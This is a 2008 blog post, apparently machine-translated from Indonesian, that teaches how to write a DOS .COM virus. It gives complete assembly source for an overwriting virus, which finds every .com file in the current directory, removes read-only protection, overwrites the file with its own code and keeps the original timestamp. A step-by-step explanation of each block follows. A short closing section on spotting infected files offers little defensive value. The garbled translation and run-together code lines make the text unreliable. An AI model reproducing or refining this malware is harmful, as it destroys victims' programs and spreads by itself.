Saturday, December 27, 2008

Make virus Com

You certainly have to write a normal program with assembly language, which resulted in a program with ektension com. To be more easily understood and will be given a sample format of the program with basic ektension com:

. Model Small
. Code
Org 100h
Label: Jmp Label2
Db Dataku the "Program Data Com"
Label2:
Mov AH, 09h
Lea DX, Dataku
Int 21h
Int 20H
End Label1



If you see then you can see that on a normal program com, there is always the command. Org 100h which is a command that at the time the program is executed by the operating system provided 100h (256) bytes empty. Or in other words the program com We will make the run to offset the 256 or 100h. You may ask, to what we provide 100h bytes empty this? To 100h bytes empty We prepared for this place by PSP (Program Segment Prefix) made by the operating system to program the way we manage this.
Program Segment Prefix (PSP)
Program Segment Prefix or often truncated to PSP, is a holdover from the era of CP / M. PSP consists of 100h or 256 bytes is used to store all information necessary for running programs. Here are strukture from the PSP to 100h bytes of program: To Offset Counted
00h 2 Byte address the interruption 20H
1 Word Address 02h segment of memory that is provided for the program
04h Byte 1 Backup
05h Byte 5 Address the interruption 21h
Word 0Ah 2 vectors Interupsi 23h
Word 0Eh 2 vectors Interupsi 23h
2 Word 12h vectors Interupsi 24h
Byte 16h 22 Reserves
2Ch 1 Word Address segment environment
Byte 2Eh 46 Reserves
5Ch 16 Byte FCB1
6Ch 16 Bytes FCB2
80h Byte 1 large characters from the command line
81h 127 Byte Command Line
Making 001 Virus
This is the first virus is a virus that will attack all programs with ektensi. COM where I work is for all the programs that have didirektory active program with all ektensi. COM and transmit the virus to him. Ditulari program that has the virus will not be able to walk normally because the original program has been stricken by the virus program. This virus is a virus that is not resident. ; Note:
; Virus will overwrite the program ditumpangi damage. Only on the distribution of
; Direktory active only. This program is not resident and is the most simple virus.
. Model Small
. Code
Org 100h
V_Length equ last-start
Start near label; Start From Virus
mov ah, 4Eh; Com First File Search
mov dx, offset filename; ds: dx -> Asciiz "*. com"
Int 21h
Back:
mov ah, 43h; To get Attribute File
mov al, 0; idem above ... ... ... ....
mov dx, 9Eh; First Com Files that are found
int 21h;
mov ah, 43h; Change File Attributes The Found
mov al, 01; idem Top ... ... ... ....
and cx, 11111110b; Turn off the Read Only
int 21h;
mov ax, 3D01h; Open file for write only
mov dx, 9Eh; File Name Is DTA
int 21h; mov bx, ax; Bx = File Handle
mov ah, 57h; Get Date File
mov al, 0; .... Idem above ... ..
int 21h;
push cx; Store Hours
push dx; Save Date mov dx, 100h; Data Start Virus
mov cx, v_length; length Virus
mov ah, 40h; Write to File Virus
int 21h;
pop dx; Data Capture date
pop cx; Retrieve Data Clock
mov ah, 57h; Set hours and
mov al, 01h; Date File
int 21h;
mov ah, 3Eh; Close file
int 21h; ... ... ... ..
mov ah, 4Fh; File Search Next
int 21h;
Back jnc; If Found, Jump
mov ah, 9h; Compose Message
mov dx, offset data; data to screen
int 21h;
Done: int 20H; terminate Program
Filename db "*. com", 0
Data db "Files On Past Direktory this virus fell ill Overall $"
Last label near
Work end startCara Virus:
. Model Small
. Code
Org 100h
V_Length equ last-start
Start near label; Start from the beginning of the virus program, variable V_Length will calculate the length, or the size of this computer virus program. By knowing the size of the program that created the virus, then we can copy this program into a virus that another program.
mov ah, 4Eh; Com First File Search
mov dx, offset filename; ds: dx -> Asciiz "*. com"
Int 21h
First, look for programs that will target ditulari with dos function, which shows the dx register file that will be sought. This search will only find the program "*. com" are active didirektory just means that the program "*. com" in the direktory others will not be contagious.
Back:
mov ah, 43h; To get Attribute File
mov al, 0; idem above ... ... ... ....
mov dx, 9Eh; First Com Files that are found
int 21h;
mov ah, 43h; Change File Attributes The Found
mov al, 01; idem Top ... ... ... ....
and cx, 11111110b; Turn off the Read Only
int 21h
After getting a search for the file, read the attributes of the file, to prevent terprotek We are writing in a file that has read-only attribute. Then the logic "and," We will shut the read-only attribute from the file that is found so that we can do the writing on the file.
mov ax, 3D01h; Open file for write only
mov dx, 9Eh; File Name Is DTA
int 21h;
mov bx, ax; Bx = File Handle
mov ah, 57h; Get Date File
mov al, 0; .... Idem above ... ..
int 21h;
push cx; Save Time
push dx; Save Date
After a read-only attribute is turned off, open the file for the purpose of writing a virus to them or to penularannya. Once the file is opened, simpalah handle or code in the file to register bx. Next, find the date and hour of the files that have been opened, and then save the results.
mov dx, 100h; Data Start Virus
mov cx, v_length; length Virus
mov ah, 40h; Write to File Virus
int 21h;
pop dx; Data Capture date
pop cx; Retrieve Data Clock
mov ah, 57h; Set hours and
mov al, 01h; Date File
int 21h;
mov ah, 3Eh; Close file
int 21h; ... ... ... .. Com extension with the program always starts at the offset to 100h (256 Byte) provided for the PSP. But because the program is the first virus We also com extension, to mengcopykan virus file to another, we will start mencopykan data offset to as many as 100 of the virus have been found.
After that, Set the date and hour of the day and date that we have been previously available. Arrange and that the date and hour of the program or file that has not changed ditulari virus. Finally, selesailah distribution of tasks and close the file.
mov ah, 4Fh; File Search Next
int 21h;
Back jnc; If Found, Jump
After the first ditulari file, search for files with the extension of the same. If found, the tularilah file in the same way as described earlier.
mov ah, 9h; Compose Message
mov dx, offset data; data to screen
int 21h;
Done: int 20H; terminate Program
Filename db "*. com", 0
Data db "Files On Past Direktory this virus fell ill Overall $"
Last label near
After the end start of the files that are on the active direktory contracting, tampilkanlah message kelayar computer "File On Direktory this virus has all fell ill." And prevent the virus killing 001
Virus from 001 you can see, that this virus is a destructive virus. programs that have been ditulari can not be treated again. So to eradicate this virus does not have other way except to remove a program that has Com ditulari virus. You can check the program ditularilari virus or not by checking the word "File On this Direktory Past Overall virus fell ill." When your file is available on this word, you can delete them. To search for words you can use an easy way, with the "Type" from the carton. In addition, you can also use the "Find" from the box to search for those words.
From the first example of this virus, you can see that by understanding how the work of a virus, you can even membasminya without programming at all. By using common programs, such as find.exe programs that are included at the time of installation dos you can make it a tool to detect and eradicate the virus.
Learn More... Assembly Language for Intel-Based Computers (5th Edition)

Source: http://sahammudien.wordpress.com/2007/12/12/make-virus-com/

No comments:

Post a Comment

Template Designed by Mastemplate